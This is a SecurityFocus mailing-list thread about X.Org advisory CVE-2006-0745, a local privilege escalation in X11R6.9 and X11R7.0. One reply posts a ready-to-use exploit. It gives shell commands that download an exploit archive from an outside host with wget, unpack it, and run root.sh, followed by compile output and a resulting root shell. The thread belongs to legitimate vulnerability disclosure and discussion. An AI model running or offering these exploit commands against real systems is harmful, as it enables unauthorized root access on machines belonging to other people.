SecurityFocus

[CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Mar 20 2006 02:00PM
Daniel Stone (daniel fooishbar org) (3 replies)

Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Mar 23 2006 05:31PM
Kyle Sallee (kyle sallee gmail com)

Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Mar 22 2006 08:16AM
Alan Coopersmith (alanc alum calberkeley org)

Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Mar 20 2006 07:40PM
H D Moore (sflist digitaloffense net)

Two second exploit, but if anyone is lazy:

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

On Monday 20 March 2006 08:00, Daniel Stone wrote:
> X.Org Security Advisory, March 20th 2006
> Local privilege escalation in X.Org server 1.0.0 and later; X11R6.9.0
> and X11R7.0
> CVE-ID: CVE-2006-0745

[ reply ]